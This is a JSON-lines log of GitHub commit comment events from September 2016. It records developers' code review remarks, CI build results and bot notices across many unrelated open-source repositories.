{"id":"4569512539","type":"CommitCommentEvent","actor":{"login":"ZombieRoxtar"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19040655,"position":124,"line":124,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-15T17:28:02Z","updated_at":"2016-09-15T17:28:02Z","body":"I was thinking that. I don't have enough experience starting child processes in Windows. Maybe I should write a program for Windows that runs python like this one."}},"created_at":"2016-09-15T17:28:02Z"}
{"id":"4569518803","type":"CommitCommentEvent","actor":{"login":"ifokkema"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":19040671,"position":null,"line":null,"path":null,"commit_id":"60b491cbca6deccb3f0c8097e483c25afb1343dc","created_at":"2016-09-15T17:29:11Z","updated_at":"2016-09-15T17:29:11Z","body":"Is this test invoked somewhere? I can't seem to find it being used anywhere."}},"created_at":"2016-09-15T17:29:11Z"}
{"id":"4569520590","type":"CommitCommentEvent","actor":{"login":"singla7dishant"},"repo":{"name":"singla7dishant/expert-waffle"},"payload":{"comment":{"id":19040677,"position":null,"line":null,"path":null,"commit_id":"06870897f439c6f12b84b7ca55c0539406e373e7","created_at":"2016-09-15T17:29:31Z","updated_at":"2016-09-15T17:29:31Z","body":"Just right\r\n"}},"created_at":"2016-09-15T17:29:31Z"}
{"id":"4569521537","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19040680,"position":null,"line":null,"path":null,"commit_id":"d22496bb8953a14c32a0a5ed9c2422707e6e4f71","created_at":"2016-09-15T17:29:42Z","updated_at":"2016-09-15T17:29:42Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_partials/terminus_navbar.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/_views/terminuspage.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/css/main.css)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/03ecbc999ba0dc184a1a46048b62ac30f70f2827/source/docs/assets/js/main.js)\n- [Vagrantfile](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/Vagrantfile)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/scripts/deploy-multidev.sh)\n- [source/docs/assets/terminuscommands.json](https://github.com/pantheon-systems/documentation/commit/78a2f38268be239cc43e8b2a119d1ef598f8cf3e/source/docs/assets/terminuscommands.json)\n"}},"created_at":"2016-09-15T17:29:42Z"}
{"id":"4569523269","type":"CommitCommentEvent","actor":{"login":"whyrusleeping"},"repo":{"name":"Kubuxu/go-reuseport"},"payload":{"comment":{"id":19040685,"position":71,"line":71,"path":"singlepoll/linux.go","commit_id":"01a528c6cf2377ddf496d9df449c73e080e44178","created_at":"2016-09-15T17:30:01Z","updated_at":"2016-09-15T17:30:01Z","body":"check me"}},"created_at":"2016-09-15T17:30:01Z"}
{"id":"4569525220","type":"CommitCommentEvent","actor":{"login":"NachiketNamjoshi"},"repo":{"name":"CyanogenMod/android_device_oneplus_oneplus3"},"payload":{"comment":{"id":19040690,"position":null,"line":null,"path":null,"commit_id":"acab5c6062b06453f591f24b7ef1e8b609e4b3a8","created_at":"2016-09-15T17:30:25Z","updated_at":"2016-09-15T17:30:25Z","body":"Kondik never trolls.\r\nWhen he does. \r\nIts \"git commit --allow-empty\""}},"created_at":"2016-09-15T17:30:25Z"}
{"id":"4569533604","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19040712,"position":21,"line":512,"path":"src/house.cpp","commit_id":"33d074fe1cb28d7f094e0e6896ada65d9cd472a2","created_at":"2016-09-15T17:31:51Z","updated_at":"2016-09-15T17:31:51Z","body":"space"}},"created_at":"2016-09-15T17:31:51Z"}
{"id":"4569539555","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"kvirc/KVIrc"},"payload":{"comment":{"id":19040735,"position":null,"line":null,"path":null,"commit_id":"eba87768bc7394b5dc5d62c5e6274fae53039ab8","created_at":"2016-09-15T17:32:53Z","updated_at":"2016-09-15T17:32:53Z","body":"thats because is can be both `c` channel or `n` nick\r\n\r\nin any case this solution works ok for now, if you wanna waste time on it be my guest."}},"created_at":"2016-09-15T17:32:53Z"}
{"id":"4569539905","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19040736,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T17:32:57Z","updated_at":"2016-09-15T17:32:57Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T17:32:57Z"}
{"id":"4569543147","type":"CommitCommentEvent","actor":{"login":"sampsongao"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19040742,"position":355,"line":519,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T17:33:30Z","updated_at":"2016-09-15T17:33:30Z","body":"v8::Value doesn't have the IsSymbol method."}},"created_at":"2016-09-15T17:33:30Z"}
{"id":"4569546163","type":"CommitCommentEvent","actor":{"login":"jjjake"},"repo":{"name":"bibanon/tubeup"},"payload":{"comment":{"id":19040752,"position":null,"line":null,"path":null,"commit_id":"953db23e77a1ec6c393be9c2430d6e17da0f8891","created_at":"2016-09-15T17:34:04Z","updated_at":"2016-09-15T17:34:04Z","body":"I meant to submit this as PR, please let me know if there's any issue with this commit! Thanks! : )"}},"created_at":"2016-09-15T17:34:04Z"}
{"id":"4569547455","type":"CommitCommentEvent","actor":{"login":"jackplux"},"repo":{"name":"jackplux/testovpluxauto"},"payload":{"comment":{"id":19040759,"position":null,"line":null,"path":null,"commit_id":"0ecfee279271fe590fb414665b7bdab6466cb600","created_at":"2016-09-15T17:34:17Z","updated_at":"2016-09-15T17:34:17Z","body":"Espace de tests pour apprendre Github"}},"created_at":"2016-09-15T17:34:17Z"}
{"id":"4569549655","type":"CommitCommentEvent","actor":{"login":"5pilow"},"repo":{"name":"leek-wars/leek-wars-client"},"payload":{"comment":{"id":19040775,"position":null,"line":null,"path":null,"commit_id":"feff6f79509affb598d8741bac8cc1555a115c02","created_at":"2016-09-15T17:34:40Z","updated_at":"2016-09-15T17:34:40Z","body":"Done"}},"created_at":"2016-09-15T17:34:40Z"}
{"id":"4569552033","type":"CommitCommentEvent","actor":{"login":"jjjake"},"repo":{"name":"bibanon/tubeup"},"payload":{"comment":{"id":19040784,"position":null,"line":null,"path":null,"commit_id":"953db23e77a1ec6c393be9c2430d6e17da0f8891","created_at":"2016-09-15T17:35:06Z","updated_at":"2016-09-15T17:35:06Z","body":"@vxbinaca We should ship a new release with this change, so tubeup will be Python2 compatible."}},"created_at":"2016-09-15T17:35:06Z"}
{"id":"4569553040","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19040789,"position":null,"line":null,"path":null,"commit_id":"7154631c28981f1e1b67958c8ea6a46210fb17fa","created_at":"2016-09-15T17:35:17Z","updated_at":"2016-09-15T17:35:17Z","body":"I was on 7 at that moment. I will change regexp to use normal space as before."}},"created_at":"2016-09-15T17:35:17Z"}
{"id":"4569560780","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040805,"position":null,"line":null,"path":null,"commit_id":"95bbaedea3bc80784db3d0bff66b53827dff54a9","created_at":"2016-09-15T17:36:39Z","updated_at":"2016-09-15T17:36:39Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-sealEventMessage2.39](http://build.prxm.it:8813/viewLog.html?buildId=3655&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:35"}},"created_at":"2016-09-15T17:36:39Z"}
{"id":"4569561906","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19040808,"position":null,"line":null,"path":null,"commit_id":"b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7","created_at":"2016-09-15T17:36:52Z","updated_at":"2016-09-15T17:36:52Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T17:36:52Z"}
{"id":"4569565139","type":"CommitCommentEvent","actor":{"login":"manavgabhawala"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19040827,"position":20,"line":50,"path":"MHacks/v1/serializers/serializers.py","commit_id":"dc902194aca8b706d5d1b20114e1c557853d0780","created_at":"2016-09-15T17:37:28Z","updated_at":"2016-09-15T17:37:28Z","body":"Why do we need both of these fields? We should just have number_of_allowable_scans and if its equal to 1 it means you can only scan once per user."}},"created_at":"2016-09-15T17:37:28Z"}
{"id":"4569565304","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":19040828,"position":null,"line":null,"path":null,"commit_id":"c29cb4d90c177894da1d75dcba3a33c13a18d6cb","created_at":"2016-09-15T17:37:30Z","updated_at":"2016-09-15T17:37:30Z","body":"Christoph Scheid your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-15T17:37:30Z"}
{"id":"4569568999","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040836,"position":null,"line":null,"path":null,"commit_id":"0aed502f8a9e3c56db909213cb3ea07715f3adb2","created_at":"2016-09-15T17:38:11Z","updated_at":"2016-09-15T17:38:11Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-PullRequest.449+39](http://build.prxm.it:8813/viewLog.html?buildId=3656&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:30"}},"created_at":"2016-09-15T17:38:11Z"}
{"id":"4569570070","type":"CommitCommentEvent","actor":{"login":"nathangibson"},"repo":{"name":"srophe/srophe-eXist-app"},"payload":{"comment":{"id":19040837,"position":null,"line":null,"path":null,"commit_id":"45d038cd598e70374030a251bc5b506cdbf05ad7","created_at":"2016-09-15T17:38:20Z","updated_at":"2016-09-15T17:38:20Z","body":"Thanks!\n"}},"created_at":"2016-09-15T17:38:20Z"}
{"id":"4569571543","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19040845,"position":null,"line":null,"path":null,"commit_id":"62c6605781a278356236db8e58ea0cd8913e569a","created_at":"2016-09-15T17:38:35Z","updated_at":"2016-09-15T17:38:35Z","body":"You know that you added nancy specific things ;p And I wanted it to be working with current 3.6.1.0 :-) but we can go this road . its better for me ;-)"}},"created_at":"2016-09-15T17:38:35Z"}
{"id":"4569572894","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19040849,"position":6,"line":123,"path":"src/etc/inc/system.inc","commit_id":"5497ae4e7809656ac7a06a257ae1bd788bdf8211","created_at":"2016-09-15T17:38:50Z","updated_at":"2016-09-15T17:38:50Z","body":"We added these as per a previous ticket and it seemed to solve some issues. Are they unneeded now or was this a killing spree? Nice work nevertheless."}},"created_at":"2016-09-15T17:38:50Z"}
{"id":"4569578119","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040864,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T17:39:46Z","updated_at":"2016-09-15T17:39:46Z","body":"I think something like this will work https://github.com/HaxeFoundation/haxe/commit/b1e615b10694d4af8b8491c260d3a4c2c5b47383\r\n\r\nI'll add all of the desired behavior here to the LuaTest file."}},"created_at":"2016-09-15T17:39:46Z"}
{"id":"4569581079","type":"CommitCommentEvent","actor":{"login":"Melvin-Tan"},"repo":{"name":"Wishes-CS3216/Wishes-Backend"},"payload":{"comment":{"id":19040879,"position":9,"line":9,"path":"Wishes/app/controllers/wishes_controller.rb","commit_id":"7a78a8932d79ec04eccf8f5870d3a010cf1e4af9","created_at":"2016-09-15T17:40:17Z","updated_at":"2016-09-15T17:40:17Z","body":"@wish = Wish.find(params[:wish_id])"}},"created_at":"2016-09-15T17:40:17Z"}
{"id":"4569583498","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"DJCrapsody/GoIV"},"payload":{"comment":{"id":19040882,"position":29,"line":1102,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"cde0675bad7e6bdab9069ab2f7b10a82dcb11aff","created_at":"2016-09-15T17:40:42Z","updated_at":"2016-09-15T17:40:42Z","body":"I'd think there's some flag to set it as immovable instead of have to add an empty touch listener? No?\r\n\r\nNot against merging this -- just seems a bit weird."}},"created_at":"2016-09-15T17:40:42Z"}
{"id":"4569584424","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":19040885,"position":null,"line":null,"path":null,"commit_id":"bb894363d1c6881bf4bb31eef017a7e3042468b0","created_at":"2016-09-15T17:40:52Z","updated_at":"2016-09-15T17:40:52Z","body":"Christoph Scheid your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-15T17:40:52Z"}
{"id":"4569587624","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19040899,"position":177,"line":11595,"path":"src/luascript.cpp","commit_id":"33d074fe1cb28d7f094e0e6896ada65d9cd472a2","created_at":"2016-09-15T17:41:28Z","updated_at":"2016-09-15T17:41:28Z","body":"here have 2 spaces?"}},"created_at":"2016-09-15T17:41:28Z"}
{"id":"4569590720","type":"CommitCommentEvent","actor":{"login":"Kubuxu"},"repo":{"name":"Kubuxu/go-reuseport"},"payload":{"comment":{"id":19040910,"position":71,"line":71,"path":"singlepoll/linux.go","commit_id":"01a528c6cf2377ddf496d9df449c73e080e44178","created_at":"2016-09-15T17:42:03Z","updated_at":"2016-09-15T17:42:03Z","body":"This is other thing I have small issue with, this should never happen. If it does there isn't really a way to recover."}},"created_at":"2016-09-15T17:42:03Z"}
{"id":"4569594991","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19040924,"position":null,"line":null,"path":null,"commit_id":"02db6d29239d57e06a98ead195abb335a5fb369a","created_at":"2016-09-15T17:42:47Z","updated_at":"2016-09-15T17:42:47Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n- [docs/local-development](https://1881kalabo-static-docs.pantheonsite.io/docs/local-development)\n- [source/docs/assets/images/kalabox-action-pull.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-action-pull.png)\n- [source/docs/assets/images/kalabox-action-push.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-action-push.png)\n- [source/docs/assets/images/kalabox-add-site.png](https://github.com/pantheon-systems/documentation/commit/02db6d29239d57e06a98ead195abb335a5fb369a/source/docs/assets/images/kalabox-add-site.png)\n"}},"created_at":"2016-09-15T17:42:47Z"}
{"id":"4569600536","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040941,"position":null,"line":null,"path":null,"commit_id":"0aed502f8a9e3c56db909213cb3ea07715f3adb2","created_at":"2016-09-15T17:43:43Z","updated_at":"2016-09-15T17:43:43Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-PullRequest.449+40](http://build.prxm.it:8813/viewLog.html?buildId=3657&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:33"}},"created_at":"2016-09-15T17:43:43Z"}
{"id":"4569604315","type":"CommitCommentEvent","actor":{"login":"bradleeedmondson"},"repo":{"name":"spdx/license-list-XML"},"payload":{"comment":{"id":19040952,"position":null,"line":null,"path":null,"commit_id":"b33090b5436c79fa4d091977c4655f0b2a796fd5","created_at":"2016-09-15T17:44:23Z","updated_at":"2016-09-15T17:44:23Z","body":"oops pasted updated license to wrong file, will revert"}},"created_at":"2016-09-15T17:44:23Z"}
{"id":"4569604507","type":"CommitCommentEvent","actor":{"login":"Elkont33"},"repo":{"name":"Elkont33/Hospitalreach"},"payload":{"comment":{"id":19040954,"position":null,"line":null,"path":null,"commit_id":"bc0616e38ca28af10b7a5fabc7c67b4e1d0003e2","created_at":"2016-09-15T17:44:25Z","updated_at":"2016-09-15T17:44:25Z","body":"Added type and memory token and updated the model "}},"created_at":"2016-09-15T17:44:25Z"}
{"id":"4569607936","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19040963,"position":24,"line":23,"path":"AluraLinq.Console/Problemas/18. obter o valor da compra mediana dos totais de notas fiscais/Problema18.cs","commit_id":"914f3192b77da675bcbc7ae0e14f2c6001b273b1","created_at":"2016-09-15T17:45:02Z","updated_at":"2016-09-15T17:45:02Z","body":"no curso de estatistica 1 tem um capitulo que explica mediana. pode usar o exemplo de lá (aqui voce citoi um exemplo com numeros, é mto abstrato, la ele usa um exemplo de algo mais palpavel). tambem pode fazer o gancho pro curso de estatistica, sem problema!"}},"created_at":"2016-09-15T17:45:02Z"}
{"id":"4569608527","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19040967,"position":null,"line":null,"path":null,"commit_id":"e59808e772f994fa0e4c382da6e3a2664ab8a28b","created_at":"2016-09-15T17:45:10Z","updated_at":"2016-09-15T17:45:10Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-unstable.94](http://build.prxm.it:8813/viewLog.html?buildId=3658&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 246 Build time: 00:01:28"}},"created_at":"2016-09-15T17:45:10Z"}
{"id":"4569609459","type":"CommitCommentEvent","actor":{"login":"guybanaga123"},"repo":{"name":"jleahy7/CSCI-2999-Capstone_Project"},"payload":{"comment":{"id":19040972,"position":null,"line":null,"path":null,"commit_id":"796319b13290c91169385feb8786f6d3da44831c","created_at":"2016-09-15T17:45:20Z","updated_at":"2016-09-15T17:45:20Z","body":"Reviewed all files but still can`t find the most up to dated version of the PP presentation..."}},"created_at":"2016-09-15T17:45:20Z"}
{"id":"4569610681","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19040978,"position":12,"line":2139,"path":"github-dark.css","commit_id":"bc376c104ab7231ce30954bfa4ae80ddcdfa8b4b","created_at":"2016-09-15T17:45:32Z","updated_at":"2016-09-15T17:45:32Z","body":"Stylelint doesn't like `::`, by the way 😉 . I'll fix it."}},"created_at":"2016-09-15T17:45:32Z"}
{"id":"4569613980","type":"CommitCommentEvent","actor":{"login":"dchacke"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19040991,"position":null,"line":null,"path":null,"commit_id":"ffe5c49c3ebb51d534a339e0d85a0aa7967923dc","created_at":"2016-09-15T17:46:07Z","updated_at":"2016-09-15T17:46:07Z","body":"❤️  👍  💯 "}},"created_at":"2016-09-15T17:46:07Z"}
{"id":"4569619763","type":"CommitCommentEvent","actor":{"login":"EnderKenji"},"repo":{"name":"iBa4x/VIP1b"},"payload":{"comment":{"id":19041006,"position":null,"line":null,"path":null,"commit_id":"878af6cb2c27ff5def4c54d71706d41bbcdc13d0","created_at":"2016-09-15T17:47:09Z","updated_at":"2016-09-15T17:47:09Z","body":"i tweeted u... DM　plss"}},"created_at":"2016-09-15T17:47:09Z"}
{"id":"4569619985","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19041007,"position":28,"line":27,"path":"AluraLinq.Console/Problemas/18. obter o valor da compra mediana dos totais de notas fiscais/Problema18.cs","commit_id":"914f3192b77da675bcbc7ae0e14f2c6001b273b1","created_at":"2016-09-15T17:47:11Z","updated_at":"2016-09-15T17:47:11Z","body":"aqui tem uma implementação de median doidona também... é um extension point que é criado para a api né?\r\no que acha de explicar \"extendendo o linq?\" parece algo bem legal. veja se se encaixa, se sim, pode ser um problema aqui entre esse e o proximo ou pode ser no final\r\n\r\nhttp://stackoverflow.com/questions/4134366/math-stats-with-linq"}},"created_at":"2016-09-15T17:47:11Z"}
{"id":"4569620663","type":"CommitCommentEvent","actor":{"login":"belfastraven"},"repo":{"name":"airend/android_kernel_bn_omap"},"payload":{"comment":{"id":19041008,"position":null,"line":null,"path":null,"commit_id":"4949a000f08cb397e11df66e6b9a75c9020b1680","created_at":"2016-09-15T17:47:17Z","updated_at":"2016-09-15T17:47:17Z","body":"Sorry--I do see it there.  It's just that when I built again a few days ago to work on the hummingbird 3.4 display issues (I had gotten  both regulator complaints and a kernel warning from cpufreqinteractive.c )  I could no longer get past the bootlader screen (no boot animation).  I remember from the xda 12 thread that that was causued there by one of the panels not having its drivers compiled....  I don't see why putting in the common defconfig would cause any problems.  I will try again."}},"created_at":"2016-09-15T17:47:17Z"}
{"id":"4569621764","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19041012,"position":12,"line":2139,"path":"github-dark.css","commit_id":"bc376c104ab7231ce30954bfa4ae80ddcdfa8b4b","created_at":"2016-09-15T17:47:28Z","updated_at":"2016-09-15T17:47:28Z","body":"Oops, I was pasting in a hurry 😆."}},"created_at":"2016-09-15T17:47:28Z"}
{"id":"4569623015","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19041014,"position":null,"line":null,"path":null,"commit_id":"62c6605781a278356236db8e58ea0cd8913e569a","created_at":"2016-09-15T17:47:43Z","updated_at":"2016-09-15T17:47:43Z","body":"Well it was half there already. We can make a separate branch from the commit before if we really need to, but there will be no way to keep this back compatible without making everything twice"}},"created_at":"2016-09-15T17:47:43Z"}
{"id":"4569631564","type":"CommitCommentEvent","actor":{"login":"olivmonnier"},"repo":{"name":"olivmonnier/keur_niaye_website"},"payload":{"comment":{"id":19041040,"position":3,"line":24,"path":"app/views/index.jade","commit_id":"6b3e7d397b0d60bb96e5eeb6360e588154dc78c8","created_at":"2016-09-15T17:49:13Z","updated_at":"2016-09-15T17:49:13Z","body":"faut rajouter un character"}},"created_at":"2016-09-15T17:49:13Z"}
{"id":"4569633276","type":"CommitCommentEvent","actor":{"login":"imod"},"repo":{"name":"jenkinsci/jenkins-scripts"},"payload":{"comment":{"id":19041043,"position":4,"line":4,"path":"scriptler/interruptPollingThreads.groovy","commit_id":"4448ed8a4849571a2ba10659ac147e954b0037b7","created_at":"2016-09-15T17:49:30Z","updated_at":"2016-09-15T17:49:30Z","body":"duration must be quoted"}},"created_at":"2016-09-15T17:49:30Z"}
{"id":"4569638133","type":"CommitCommentEvent","actor":{"login":"jvanrijswijck"},"repo":{"name":"jvanrijswijck/CART360"},"payload":{"comment":{"id":19041057,"position":5,"line":9,"path":"README.md","commit_id":"6dea0446c880511cb42df9ed5c0e59009715545d","created_at":"2016-09-15T17:50:23Z","updated_at":"2016-09-15T17:50:23Z","body":"Well done!"}},"created_at":"2016-09-15T17:50:23Z"}
{"id":"4569641662","type":"CommitCommentEvent","actor":{"login":"andreymal"},"repo":{"name":"TyanNN/libtabun.rs"},"payload":{"comment":{"id":19041068,"position":82,"line":562,"path":"src/lib.rs","commit_id":"7465e5d947439ee1a47ec574224e0742764d933d","created_at":"2016-09-15T17:50:59Z","updated_at":"2016-09-15T17:50:59Z","body":"Ой приспичит Орхиду json-либу потюнинговать и сломается всё нафиг"}},"created_at":"2016-09-15T17:50:59Z"}
{"id":"4569641718","type":"CommitCommentEvent","actor":{"login":"fhueske"},"repo":{"name":"dataArtisans/flink-training-exercises"},"payload":{"comment":{"id":19041070,"position":122,"line":122,"path":"src/main/java/com/dataartisans/flinktraining/exercises/datastream_java/state/TravelTimePrediction.java","commit_id":"ed4a3429a253fd056f7c3e882e22e9df38d05c59","created_at":"2016-09-15T17:50:59Z","updated_at":"2016-09-15T17:50:59Z","body":"Hi @maver1ck, thanks for the suggestion. Actually, the key-partitioned state is the recommended solution. This is due to two reasons: 1) The exercise states, that a model should be trained for each destination cell. If you use the `Checkpointed` interface, you have to use a HashMap to store multiple models. 2) Key-partitioned state should be always preferred over the `Checkpointed` interface, because only operators with key-partitioned state will be able to change their parallelism once this feature is supported."}},"created_at":"2016-09-15T17:50:59Z"}
{"id":"4569651043","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19041092,"position":34,"line":39,"path":"AluraLinq.Console/Problemas/19. buscar dados das vendas ordenado por data na nota fiscal, com paginação/Problema19.cs","commit_id":"257e2b0506ca57223c27c57c173975bc313ae792","created_at":"2016-09-15T17:52:38Z","updated_at":"2016-09-15T17:52:38Z","body":"nesse caso especifico, me parece que o metodo MosstraPagina pode ter um metodo extraido la de dentro, a partir do momento em que é feito o for (o laço), pode ser extraido na parte que faz a view, que imprime"}},"created_at":"2016-09-15T17:52:38Z"}
{"id":"4569651839","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"airend/android_kernel_bn_omap"},"payload":{"comment":{"id":19041094,"position":null,"line":null,"path":null,"commit_id":"4949a000f08cb397e11df66e6b9a75c9020b1680","created_at":"2016-09-15T17:52:47Z","updated_at":"2016-09-15T17:52:47Z","body":"But this is kernel 3.0… There are two different bn/common branches, which pull the different kernel settings, right? Also, the `wip/k-next` branch expects sources in `kernel/omap4/common`."}},"created_at":"2016-09-15T17:52:47Z"}
{"id":"4569651884","type":"CommitCommentEvent","actor":{"login":"ashwinr64"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041095,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T17:52:48Z","updated_at":"2016-09-15T17:52:48Z","body":"Cherry-pick malfunction .eh?"}},"created_at":"2016-09-15T17:52:48Z"}
